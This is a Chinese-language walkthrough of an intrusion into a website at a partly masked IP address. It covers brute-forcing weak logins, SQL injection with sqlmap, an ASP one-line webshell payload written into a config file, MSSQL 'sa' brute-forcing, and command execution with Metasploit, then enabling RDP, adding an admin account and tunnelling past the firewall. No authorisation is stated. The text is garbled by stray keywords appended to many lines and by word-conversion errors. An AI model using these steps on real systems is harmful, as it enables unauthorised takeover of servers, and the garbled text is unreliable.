一次完整的渗透测试

目标网站:39.xxx.xxx.xxxhtml

 

 一阶段前台测试:sql

一、前台存在登录入口且无验证码(确定要暴力破解啊)shell

二、前台url参数处加敏感字符数据库报错存在sql注入数据库

三、前台登录处输入危险字符,数据库报错存在post注入缓存

测试结果以下:
cookie

暴力破解得到xss

用户名:admin编辑器

密码:123456post

 

 

 

 

利用sqlmap跑注入并无跑出任何数据测试

只能登录看一下了

 

 

2、登录前台测试

利用前台的会员登录发现有使用第三方编辑器(并无找到可利用漏洞)

存在xss漏洞

存在sql注入漏洞

 

 

 

 

 

 

 

 

 

 

 

 在登录的状态下继续进行sql注入(burp  copyto file )发现跑出来一个表

 

 

 

 

 

 

 只跑出了当前帐户和一个同级帐户

到这里看了眼后台仍是一脸懵逼

 

 

 

3、黑盒已经很差搞了,下载同类CMS

搭建环境撸一把

把相同源码cms数据库表名

将对应代表加入sqlmap库中

路径:sqlmap/txt/common-tables.txt

(表名必定要放前边放最后要跑一年的)

继续sqlmap跑、

 

 

 

 成功进入后台

 

4、getshell


进入后台以后发现编辑器两个

文件上传白名单,试了好久,基本行不通了

后台依旧存在XSS漏洞(这里的XSS能够利用拿到后台管理员cookie)

 

 

 搞了半天发现又遇到瓶颈了

再去撸一把源码

发现当更新缓存的时候,根目录下多了一个HTML文件修改html文件后发现报错

在后台参数配置处修改配置发现报错

审查代码发现代码漏洞

 

anxinMall.basic.asp是一个ASP文件考虑写入一句话

本地构造payload(这里随便改点东西网站就瘫了若是在目标网站那确定凉凉了)

"%> <%eval request ("pass")%> <%'

 

 

菜刀链接、

 

 

 

 5、提权、

 nmap扫描发现目标开放1433端口

msf对1433端口sa进行爆破

 

爆破成功

mssql帐号和密码为:sa /123456

使用msf命令执行模块,执行最终的dos命令

use auxiliary/admin/mssql/mssql_exec

开启3389端口而且创建管理用户之后

利用HTTP隧道进行链接3389(绕过防火墙)

详细方法见下面的网址

https://www.cnblogs.com/xiaoyunxiaogang/p/10939485.html

另外能够

经过MSFVenom生成exe后门木马拿shell

相关文章
相关标签/搜索